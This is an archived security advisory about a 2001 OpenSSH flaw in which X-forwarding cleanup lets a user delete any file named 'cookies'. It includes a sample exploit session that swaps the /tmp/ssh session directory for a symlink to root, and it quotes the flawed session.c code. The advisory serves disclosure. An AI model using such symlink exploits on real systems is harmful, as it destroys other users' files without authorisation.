TUCoPS :: Linux :: Apps N-Z :: openss~1.htm

OpenSSH - delete cookies file
Vulnerability

    OpenSSH

Affected

    OpenSSH

Description

    'zen-parse'  found  following.   You  can  delete  any file on the
    filesystem you want... as long as its called cookies.  Not  really
    a  very  useful  bug,  but  could  cause  annoyances to people who
    actually like their cookies.

    Sample exploit:

        [root@clarity /root]# touch /cookies;ls /cookies
        /cookies
        [root@clarity /root]# ssh zen@localhost
        zen@localhost's password:
        Last login: Mon Jun  4 20:22:39 2001 from localhost.local
        Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
        [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
        [zen@clarity zen]$ logout
        Connection to localhost closed.
        [root@clarity /root]# ls /cookies
        /bin/ls: /cookies: No such file or directory

    Tested on Red Hat Linux release 7.0 (Guinness):

        [zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd
        openssh-server-2.5.2p2-1.7.2
        [zen-parse@clarity zen-parse]$ ssh -V
        OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090581f

    The  configuration  file  has  not  been modified from the default
    settings.  Although sshd does drop root privileges, the  processes
    groups are not cleared. (From /proc/$$/status of the sshd handling
    the  session,  and  the  output  of  strace and ltrace. (no use of
    initgroups in the  ltrace output of  the process that  creates the
    directory, although it does do  change euid before hand. there  no
    setgroups in the strace output.)

    The file itself is  created with O_EXCL so  a symlink in place  of
    the file cannot be used to create/overwrite arbitrary files.

    This vulnerability works  fine on both  RedHat 7.1 &  7.0 with the
    latest updated packages from RedHat installed.

    Jerry  Connolly  tested  it  on  OpenSSH_2.5.2  on  OpenBSD and it
    worked.  He had  to enable X forwarding  on the client and  server
    before the remote machine would create (and attempt to unlink()  )
    the  cookies  file.   The  offending  code  is in session.c in the
    xauthfile_cleanup_proc() function

        <SNIP>
        /*
         * Remove local Xauthority file.
         */
        void
        xauthfile_cleanup_proc(void *ignore)
        {
            debug("xauthfile_cleanup_proc called");
        
            if (xauthfile != NULL) {
                char *p;
                unlink(xauthfile);
        </SNIP>

    where xauthfile  points to  a buffer  containing the  name of  the
    cookies file.

Solution

    Fixed in openssh's cvs (see www.openssh.com).

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH